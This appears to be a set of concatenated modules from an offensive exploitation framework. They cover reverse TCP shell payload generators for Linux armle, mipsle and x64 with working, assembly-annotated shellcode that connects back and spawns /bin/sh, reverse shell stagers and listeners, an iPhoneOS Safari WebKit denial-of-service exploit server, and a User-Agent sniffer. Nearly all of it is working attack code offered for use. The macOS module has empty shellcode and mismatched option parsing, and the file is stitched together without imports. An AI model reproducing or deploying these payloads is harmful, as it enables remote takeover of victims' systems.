class HatSploitModule(HatSploitModule):
tcp = tcp()
payload = payload()
details = {
'Name': "macOS x64 Shell Reverse TCP",
'Module': "payload/macos/x64/shell_reverse_tcp",
'Authors': ['enty8080'],
'Description': "Shell Reverse TCP Payload for macOS x64.",
'Dependencies': [''],
'Comments': [''],
'Risk': "low"
}
options = {
'LHOST': {
'Description': "Local host.",
'Value': tcp.get_local_host(),
'Type': "ip",
'Required': True
},
'LPORT': {
'Description': "Local port.",
'Value': 8888,
'Type': "port",
'Required': True
},
'FORMAT': {
'Description': "Output format.",
'Value': "macho",
'Type': None,
'Required': True
},
'LPATH': {
'Description': "Local path.",
'Value': "/tmp/payload.bin",
'Type': None,
'Required': True
}
}
def run(self):
bind_port, file_format, local_file = self.parser.parse_options(
self.options)
bind_port = self.payload.port_to_bytes(bind_port)
if not file_format in self.payload.formats.keys():
self.badges.output_error("Invalid format!")
return
self.badges.output_process("Generating shellcode...")
shellcode = (b"")
self.badges.output_process("Generating payload...")
payload = self.payload.generate(file_format, 'x64', shellcode)
self.badges.output_process("Saving to " + local_file + "...")
with open(local_file, 'wb') as f:
f.write(payload)
self.badges.output_success("Successfully saved to " + local_file + "!")
class HatSploitModule(HatSploitModule):
tcp = tcp()
handler = handler
details = {
'Name': "iPhoneOS MobileSafari.app WebKit Filter DoS",
'Module': "exploit/iphoneos/mobile_safari_app/webkit_filter_dos",
'Authors': ['enty8080'],
'Description':
"iPhoneOS 9.1 till 12.1 MobileSafari.app WebKit Filter DoS.",
'Dependencies': [''],
'Comments': [''],
'Risk': "high"
}
options = {
'LHOST': {
'Description': "Local host.",
'Value': tcp.get_local_host(),
'Type': "ip",
'Required': True
},
'LPORT': {
'Description': "Local port.",
'Value': 80,
'Type': "port",
'Required': True
},
'FOREVER': {
'Description': "Start http server forever.",
'Value': "no",
'Type': "boolean",
'Required': False
}
}
def start_server(self, local_host, local_port, forever):
try:
httpd = socketserver.TCPServer((local_host, int(local_port)),
self.handler)
self.badges.output_process("Starting http server on port " +
local_port + "...")
self.badges.output_process("Serving payload on http server...")
if forever.lower() in ['yes', 'y']:
while True:
self.badges.output_process("Listening for connections...")
httpd.handle_request()
else:
self.badges.output_process("Listening for connections...")
httpd.handle_request()
except Exception:
self.badges.output_error("Failed to start http server on port " +
local_port + "!")
def run(self):
local_host, local_port, forever = self.parser.parse_options(
self.options)
self.start_server(local_host, local_port, forever)
class HatSploitModule(HatSploitModule):
tcp = tcp()
handler = handler
details = {
'Name': "User Agent Sniffer",
'Module': "auxiliary/multi/sniffer/user_agent_sniffer",
'Authors': ['enty8080'],
'Description': "Sniff User-Agent through URL.",
'Dependencies': [''],
'Comments': [''],
'Risk': "medium"
}
options = {
'LHOST': {
'Description': "Local host.",
'Value': tcp.get_local_host(),
'Type': "ip",
'Required': True
},
'LPORT': {
'Description': "Local port.",
'Value': 80,
'Type': "port",
'Required': True
},
'FOREVER': {
'Description': "Start http server forever.",
'Value': "no",
'Type': "boolean",
'Required': False
}
}
def start_server(self, local_host, local_port, forever):
try:
httpd = socketserver.TCPServer((local_host, int(local_port)),
self.handler)
self.badges.output_process("Starting http server on port " +
local_port + "...")
if forever.lower() in ['yes', 'y']:
while True:
self.badges.output_process("Listening for connections...")
httpd.handle_request()
else:
self.badges.output_process("Listening for connections...")
httpd.handle_request()
except Exception:
self.badges.output_error("Failed to start http server on port " +
local_port + "!")
def run(self):
local_host, local_port, forever = self.parser.parse_options(
self.options)
self.start_server(local_host, local_port, forever)
class HatSploitModule(HatSploitModule):
tcp = tcp()
handler = handler()
details = {
'Name': "Shell Reverse TCP Stager",
'Module': "exploit/multi/stager/shell_reverse_tcp",
'Authors': ['enty8080'],
'Description': "Cross-platform reverse TCP shell.",
'Dependencies': [''],
'Comments': [''],
'Risk': "high"
}
options = {
'LHOST': {
'Description': "Local host.",
'Value': tcp.get_local_host(),
'Type': "ip",
'Required': True
},
'LPORT': {
'Description': "Local port.",
'Value': 8888,
'Type': "port",
'Required': True
},
'FOREVER': {
'Description': "Start listener forever.",
'Value': "no",
'Type': "boolean",
'Required': False
}
}
def run(self):
local_host, local_port, forever = self.parser.parse_options(
self.options)
if self.handler.start_handler(local_host, local_port):
if forever.lower() in ['yes', 'y']:
while True:
if not self.handler.handle_session(
self.details['Module'], "multi/shell", local_host,
local_port):
return
else:
if not self.handler.handle_session(self.details['Module'],
"multi/shell", local_host,
local_port):
return
class HatSploitModule(HatSploitModule):
sessions = sessions()
tcp = tcp()
listener = listener()
session = None
id_number = 0
details = {
'Name': "Linux Membrane Reverse TCP Stager",
'Module': "exploit/linux/stager/membrane_reverse_tcp",
'Authors': ['enty8080'],
'Description':
"Linux reverse TCP shell with full remote functionality.",
'Dependencies': [''],
'Comments': [''],
'Risk': "high"
}
options = {
'LHOST': {
'Description': "Local host.",
'Value': tcp.get_local_host(),
'Type': "ip",
'Required': True
},
'LPORT': {
'Description': "Local port.",
'Value': 8888,
'Type': "port",
'Required': True
},
'FOREVER': {
'Description': "Start listener forever.",
'Value': "no",
'Type': "boolean",
'Required': False
}
}
def add_session(self, session, local_port, address):
self.sessions.add_session("linux/membrane", self.id_number,
self.details['Module'], address, local_port,
session)
self.badges.output_success("Session " + str(self.id_number) +
" opened!")
self.id_number += 1
def start_listener(self, forever, local_host, local_port):
self.badges.output_process("Starting listener on port " + local_port +
"...")
try:
server = self.listener.start_listener(local_host, local_port)
except Exception:
return
if forever.lower() in ['yes', 'y']:
while True:
try:
session, address = self.listener.listen(
local_host, local_port, server)
except Exception:
return
if session:
self.add_session(session, local_port, address)
else:
try:
session, address = self.listener.listen(
local_host, local_port, server)
except Exception:
return
if session:
self.add_session(session, local_port, address)
def run(self):
local_host, local_port, forever = self.parser.parse_options(
self.options)
self.start_listener(forever, local_host, local_port)
class HatSploitModule(HatSploitModule):
tcp = tcp()
payload = payload()
details = {
'Name': "Linux armle Shell Reverse TCP",
'Module': "payload/linux/armle/shell_reverse_tcp",
'Authors': ['enty8080'],
'Description': "Shell Reverse TCP Payload for Linux armle.",
'Dependencies': [''],
'Comments': [''],
'Risk': "low"
}
options = {
'LHOST': {
'Description': "Local host.",
'Value': tcp.get_local_host(),
'Type': "ip",
'Required': True
},
'LPORT': {
'Description': "Local port.",
'Value': 8888,
'Type': "port",
'Required': True
},
'FORMAT': {
'Description': "Output format.",
'Value': "elf",
'Type': None,
'Required': True
},
'LPATH': {
'Description': "Local path.",
'Value': "/tmp/payload.bin",
'Type': None,
'Required': True
}
}
def run(self):
local_host, local_port, file_format, local_file = self.parser.parse_options(
self.options)
local_host = self.payload.host_to_bytes(local_host)
local_port = self.payload.port_to_bytes(local_port)
if not file_format in self.payload.formats.keys():
self.badges.output_error("Invalid format!")
return
self.badges.output_process("Generating shellcode...")
shellcode = (
b"\x01\x10\x8F\xE2" + b"\x11\xFF\x2F\xE1" + b"\x02\x20\x01\x21" +
b"\x92\x1A\x0F\x02" + b"\x19\x37\x01\xDF" + b"\x06\x1C\x08\xA1" +
b"\x10\x22\x02\x37" + b"\x01\xDF\x3F\x27" + b"\x02\x21\x30\x1c" +
b"\x01\xdf\x01\x39" + b"\xFB\xD5\x05\xA0" + b"\x92\x1a\x05\xb4" +
b"\x69\x46\x0b\x27" + b"\x01\xDF\xC0\x46" + b"\x02\x00" +
local_port + # "\x12\x34" struct sockaddr and port
local_host + # reverse ip address
b"\x2f\x62\x69\x6e" + # /bin
b"\x2f\x73\x68\x00" # /sh\0
)
self.badges.output_process("Generating payload...")
payload = self.payload.generate(file_format, 'armle', shellcode)
self.badges.output_process("Saving to " + local_file + "...")
with open(local_file, 'wb') as f:
f.write(payload)
self.badges.output_success("Successfully saved to " + local_file + "!")
class HatSploitModule(HatSploitModule):
tcp = tcp()
payload = payload()
details = {
'Name': "Linux mipsle Shell Reverse TCP",
'Module': "payload/linux/mipsle/shell_reverse_tcp",
'Authors': ['enty8080'],
'Description': "Shell Reverse TCP Payload for Linux mipsle.",
'Dependencies': [''],
'Comments': [''],
'Risk': "low"
}
options = {
'LHOST': {
'Description': "Local host.",
'Value': tcp.get_local_host(),
'Type': "ip",
'Required': True
},
'LPORT': {
'Description': "Local port.",
'Value': 8888,
'Type': "port",
'Required': True
},
'FORMAT': {
'Description': "Output format.",
'Value': "elf",
'Type': None,
'Required': True
},
'LPATH': {
'Description': "Local path.",
'Value': "/tmp/payload.bin",
'Type': None,
'Required': True
}
}
def run(self):
local_host, local_port, file_format, local_file = self.parser.parse_options(
self.options)
local_host = self.payload.host_to_bytes(local_host)
local_port = self.payload.port_to_bytes(local_port)
if not file_format in self.payload.formats.keys():
self.badges.output_error("Invalid format!")
return
self.badges.output_process("Generating shellcode...")
shellcode = (
b"\xff\xff\x04\x28" + # slti a0,zero,-1
b"\xa6\x0f\x02\x24" + # li v0,4006
b"\x0c\x09\x09\x01" + # syscall 0x42424
b"\x11\x11\x04\x28" + # slti a0,zero,4369
b"\xa6\x0f\x02\x24" + # li v0,4006
b"\x0c\x09\x09\x01" + # syscall 0x42424
b"\xfd\xff\x0c\x24" + # li t4,-3
b"\x27\x20\x80\x01" + # nor a0,t4,zero
b"\xa6\x0f\x02\x24" + # li v0,4006
b"\x0c\x09\x09\x01" + # syscall 0x42424
b"\xfd\xff\x0c\x24" + # li t4,-3
b"\x27\x20\x80\x01" + # nor a0,t4,zero
b"\x27\x28\x80\x01" + # nor a1,t4,zero
b"\xff\xff\x06\x28" + # slti a2,zero,-1
b"\x57\x10\x02\x24" + # li v0,4183
b"\x0c\x09\x09\x01" + # syscall 0x42424
b"\xff\xff\x44\x30" + # andi a0,v0,0xffff
b"\xc9\x0f\x02\x24" + # li v0,4041
b"\x0c\x09\x09\x01" + # syscall 0x42424
b"\xc9\x0f\x02\x24" + # li v0,4041
b"\x0c\x09\x09\x01" + # syscall 0x42424
local_port + b"\x05\x3c" + # "\x7a\x69" lui a1,0x697a
b"\x02\x00\xa5\x34" + # ori a1,a1,0x2
b"\xf8\xff\xa5\xaf" + # sw a1,-8(sp)
local_host[2:] + b"\x05\x3c" + # "\x00\x01" lui a1,0x100
local_host[:2] + b"\xa5\x34" + # "\x7f\x00" ori a1,a1,0x7f
b"\xfc\xff\xa5\xaf" + # sw a1,-4(sp)
b"\xf8\xff\xa5\x23" + # addi a1,sp,-8
b"\xef\xff\x0c\x24" + # li t4,-17
b"\x27\x30\x80\x01" + # nor a2,t4,zero
b"\x4a\x10\x02\x24" + # li v0,4170
b"\x0c\x09\x09\x01" + # syscall 0x42424
b"\x62\x69\x08\x3c" + # lui t0,0x6962
b"\x2f\x2f\x08\x35" + # ori t0,t0,0x2f2f
b"\xec\xff\xa8\xaf" + # sw t0,-20(sp)
b"\x73\x68\x08\x3c" + # lui t0,0x6873
b"\x6e\x2f\x08\x35" + # ori t0,t0,0x2f6e
b"\xf0\xff\xa8\xaf" + # sw t0,-16(sp)
b"\xff\xff\x07\x28" + # slti a3,zero,-1
b"\xf4\xff\xa7\xaf" + # sw a3,-12(sp)
b"\xfc\xff\xa7\xaf" + # sw a3,-4(sp)
b"\xec\xff\xa4\x23" + # addi a0,sp,-20
b"\xec\xff\xa8\x23" + # addi t0,sp,-20
b"\xf8\xff\xa8\xaf" + # sw t0,-8(sp)
b"\xf8\xff\xa5\x23" + # addi a1,sp,-8
b"\xec\xff\xbd\x27" + # addiu sp,sp,-20
b"\xff\xff\x06\x28" + # slti a2,zero,-1
b"\xab\x0f\x02\x24" + # li v0,4011
b"\x0c\x09\x09\x01" # syscall 0x42424
)
self.badges.output_process("Generating payload...")
payload = self.payload.generate(file_format, 'mipsle', shellcode)
self.badges.output_process("Saving to " + local_file + "...")
with open(local_file, 'wb') as f:
f.write(payload)
self.badges.output_success("Successfully saved to " + local_file + "!")
class HatSploitModule(HatSploitModule):
tcp = tcp()
payload = payload()
details = {
'Name': "Linux x64 Shell Reverse TCP",
'Module': "payload/linux/x64/shell_reverse_tcp",
'Authors': ['enty8080'],
'Description': "Shell Reverse TCP Payload for Linux x64.",
'Dependencies': [''],
'Comments': [''],
'Risk': "low"
}
options = {
'LHOST': {
'Description': "Local host.",
'Value': tcp.get_local_host(),
'Type': "ip",
'Required': True
},
'LPORT': {
'Description': "Local port.",
'Value': 8888,
'Type': "port",
'Required': True
},
'FORMAT': {
'Description': "Output format.",
'Value': "elf",
'Type': None,
'Required': True
},
'LPATH': {
'Description': "Local path.",
'Value': "/tmp/payload.bin",
'Type': None,
'Required': True
}
}
def run(self):
local_host, local_port, file_format, local_file = self.parser.parse_options(
self.options)
local_host = self.payload.host_to_bytes(local_host)
local_port = self.payload.port_to_bytes(local_port)
if not file_format in self.payload.formats.keys():
self.badges.output_error("Invalid format!")
return
self.badges.output_process("Generating shellcode...")
shellcode = (
b"\x6a\x29" + # pushq $0x29
b"\x58" + # pop %rax
b"\x99" + # cltd
b"\x6a\x02" + # pushq $0x2
b"\x5f" + # pop %rdi
b"\x6a\x01" + # pushq $0x1
b"\x5e" + # pop %rsi
b"\x0f\x05" + # syscall
b"\x48\x97" + # xchg %rax,%rdi
b"\x48\xb9\x02\x00" + # movabs $0x100007fb3150002,%rcx
local_port + # port
local_host + # ip
b"\x51" + # push %rcx
b"\x48\x89\xe6" + # mov %rsp,%rsi
b"\x6a\x10" + # pushq $0x10
b"\x5a" + # pop %rdx
b"\x6a\x2a" + # pushq $0x2a
b"\x58" + # pop %rax
b"\x0f\x05" + # syscall
b"\x6a\x03" + # pushq $0x3
b"\x5e" + # pop %rsi
b"\x48\xff\xce" + # dec %rsi
b"\x6a\x21" + # pushq $0x21
b"\x58" + # pop %rax
b"\x0f\x05" + # syscall
b"\x75\xf6" + # jne 27 <dup2_loop>
b"\x6a\x3b" + # pushq $0x3b
b"\x58" + # pop %rax
b"\x99" + # cltd
b"\x48\xbb\x2f\x62\x69\x6e\x2f" + # movabs $0x68732f6e69622f,%rbx
b"\x73\x68\x00" + #
b"\x53" + # push %rbx
b"\x48\x89\xe7" + # mov %rsp,%rdi
b"\x52" + # push %rdx
b"\x57" + # push %rdi
b"\x48\x89\xe6" + # mov %rsp,%rsi
b"\x0f\x05" # syscall
)
self.badges.output_process("Generating payload...")
payload = self.payload.generate(file_format, 'x64', shellcode)
self.badges.output_process("Saving to " + local_file + "...")
with open(local_file, 'wb') as f:
f.write(payload)
self.badges.output_success("Successfully saved to " + local_file + "!")